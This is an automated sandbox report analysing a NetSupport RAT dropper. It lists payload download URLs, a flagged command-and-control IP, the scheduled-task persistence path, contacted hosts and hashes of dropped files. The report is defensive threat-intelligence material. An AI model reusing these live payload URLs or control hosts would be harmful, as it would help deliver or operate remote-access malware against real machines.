http://secure.globalsign.net/cacert/ObjectSign.crt09	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	false		high
http://%s/testpage.htmwininet.dll	client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		high
http://www.pci.co.uk/supportsupport	client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.asp:	client32.exe, 00000004.00000002.4575278907.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.2559373410.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cycleconf.com/J	lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cycleconf.com/dwnld/2nd2_1.zipt	lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cycleconf.com/dwnld/2nd2_2.zipz	lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1RESUMEPRINTING	client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		high
http://%s/testpage.htm	client32.exe, client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspT	client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cycleconf.com/dwnld/2nd2_2.zipr	lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.globalsign.net/repository/0	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	false		high
http://%s/fakeurl.htm	client32.exe, client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	false		high
https://cycleconf.com/dwnld/2nd2_2.zip(	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microso	lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cycleconf.com/dwnld/2nd2_1.zipU	lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cycleconf.com/dwnld/2nd2_4.zipW	lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspp	client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.globalsign.net/repository09	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	false		high
http://www.netsupportschool.com/tutor-assistant.asp11(	client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		high
https://cycleconf.com/4	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cycleconf.com/$6N	lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp	client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspn	client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cycleconf.com/dwnld/2nd2_3.zip=	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pci.co.uk/support	client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		high
https://cycleconf.com/dwnld/2nd2_3.zipcache	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cycleconf.com/dwnld/2nd2_4.zipr	lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspz	client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.crossteccorp.com	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, TCCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	false		high
http://127.0.0.1	client32.exe, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/	client32.exe, 00000004.00000002.4575278907.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.2559373410.0000000004E5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/	lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://secure.globalsign.net/cacert/PrimObject.crt0	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	false		high
https://cycleconf.com/dwnld/2nd2_3.zipnd2_2.zip	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217417326.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217331430.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217525712.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217623422.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	false		high
https://cycleconf.com/dwnld/2nd2_4.zipcache	lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp2	client32.exe, 00000004.00000003.2559464023.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4575210843.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cycleconf.com/dwnld/2nd2_2.zipX	lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cycleconf.com/	lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
88.210.12.58	ganeres1.com	Russian Federation	25308	CITYLAN-ASRU	true
23.254.224.41	cycleconf.com	United States	54290	HOSTWINDSUS	false
104.26.0.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572208
Start date and time:	2024-12-10 08:56:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lFxGd66yDa.exe renamed because original name is a hash value
Original Sample Name:	d5f5204efc969b0a9a132413c637f09bce02cff7ea932c504d418e80265158f9.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@7/26@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 77% Number of executed functions: 144 Number of non-executed functions: 194
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: lFxGd66yDa.exe

Simulations

Behavior and APIs

Time	Type	Description
02:57:59	API Interceptor	11571126x Sleep call for process: client32.exe modified
08:57:29	Task Scheduler	Run new task: DNScache path: C:\Users\user\AppData\Local\DNScache\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
88.210.12.58	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	http://88.210.12.58/fakeurl.htm
88.210.12.58	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	http://88.210.12.58/fakeurl.htm
23.254.224.41	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse
23.254.224.41	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse
104.26.0.231	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	qvoLvRpRbr.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Update.js	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.0.231
ganeres1.com	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	88.210.12.58
cycleconf.com	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	23.254.224.41
cycleconf.com	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	23.254.224.41

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTWINDSUS	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	23.254.224.41
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	23.254.224.41
	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	142.11.240.128
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	192.119.104.64
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	142.11.240.155
	ppc.elf	Get hash	malicious	Mirai	Browse	23.254.189.226
	mpsl.elf	Get hash	malicious	Mirai	Browse	23.254.189.241
	ppc.elf	Get hash	malicious	Unknown	Browse	192.236.246.50
	sora.spc.elf	Get hash	malicious	Mirai	Browse	23.254.189.223
	https://dragonfly.cloudstore.business/file/d/1iZ8GX_NkrnJvRM8atkT-YMQtlk0GchX1/view?usp=sharing_eil_m&ts=98923449	Get hash	malicious	Unknown	Browse	104.168.157.45
CITYLAN-ASRU	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	88.210.12.58
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	88.210.12.58
	OocBsRyXoT.elf	Get hash	malicious	Gafgyt, Mirai	Browse	212.118.43.167
	HNzkADzkE2.elf	Get hash	malicious	Gafgyt, Mirai	Browse	212.118.43.167
	arm5.elf	Get hash	malicious	Gafgyt, Mirai	Browse	212.118.43.167
	x86.elf	Get hash	malicious	Mirai	Browse	212.118.43.167
	arm7.elf	Get hash	malicious	Mirai	Browse	212.118.43.167
	file.exe	Get hash	malicious	Unknown	Browse	88.210.6.42
	file.exe	Get hash	malicious	Unknown	Browse	88.210.6.42
	0tGEmgFUHk.elf	Get hash	malicious	Unknown	Browse	212.118.43.167
CLOUDFLARENETUS	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	104.26.0.231
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	Valutazione della sicurezza IT - Azione urgente richiesta.html	Get hash	malicious	Unknown	Browse	104.16.117.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.21.84.67
	SC3sPWT51E.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.161.29
	4C1bAkWboc.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.70.164
	SC3sPWT51E.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.65
	ro7MnkIxJk.exe	Get hash	malicious	LummaC	Browse	104.21.29.214
	DqEJwd61Uw.exe	Get hash	malicious	Zhark RAT	Browse	104.21.74.110

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	23.254.224.41
	n09qkE6r6n.lnk	Get hash	malicious	Unknown	Browse	23.254.224.41
	DqEJwd61Uw.exe	Get hash	malicious	Zhark RAT	Browse	23.254.224.41
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	23.254.224.41
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	23.254.224.41
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	23.254.224.41
	http://crissertaoericardo.com.br/images/document.pif.rar	Get hash	malicious	GuLoader	Browse	23.254.224.41
	tQoSuhQIdC.msi	Get hash	malicious	Unknown	Browse	23.254.224.41
	A8Uynu9lwi.lnk	Get hash	malicious	Unknown	Browse	23.254.224.41
	MsmxWY8nj7.exe	Get hash	malicious	RHADAMANTHYS	Browse	23.254.224.41

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\DNScache\AudioCapture.dll	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\DNScache\AudioCapture.dll

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93560
Entropy (8bit):	6.5461580255883876
Encrypted:	false
SSDEEP:	1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
MD5:	4182F37B9BA1FA315268C669B5335DDE
SHA1:	2C13DA0C10638A5200FED99DCDCF0DC77A599073
SHA-256:	A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
